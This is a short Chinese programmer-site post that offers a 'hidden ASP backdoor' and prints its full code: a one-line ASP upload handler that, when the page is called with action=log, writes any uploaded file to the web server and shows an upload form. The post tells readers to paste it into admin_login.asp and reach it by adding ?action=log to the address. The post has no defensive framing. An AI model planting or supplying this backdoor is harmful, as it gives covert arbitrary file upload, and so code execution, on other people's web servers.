欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

隐蔽的ASP后门 大家可以查看下

程序员文章站 2022-05-28 16:20:04
复制代码 代码如下: <%if request.querystring("action")="log" then a=request.totalbytes:if a...
复制代码 代码如下:

<%if request.querystring("action")="log" then
a=request.totalbytes:if a then b="adodb.stream":set c=createobject(b):c.type=1:c.open:c.write request.binaryread(a):c.position=0:d=c.read:e=chrb(13)&chrb(10):f=instrb(d,e):g=instrb(f+1,d,e):set h=createobject(b):h.type=1:h.open:c.position=f+1:c.copyto h,g-f-3:h.position=0:h.type=2:h.charset="big5":i=h.readtext:h.close:j=mid(i,instrrev(i,"\")+1,g):k=instrb(d,e&e)+4:l=instrb(k+1,d,leftb(d,f-1))-k-2:h.type=1:h.open:c.position=k-1:c.copyto h,l:h.savetofile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>

比如编辑在“admin_login.asp”下
以后只需要输入“admin_login.asp?action=log”即可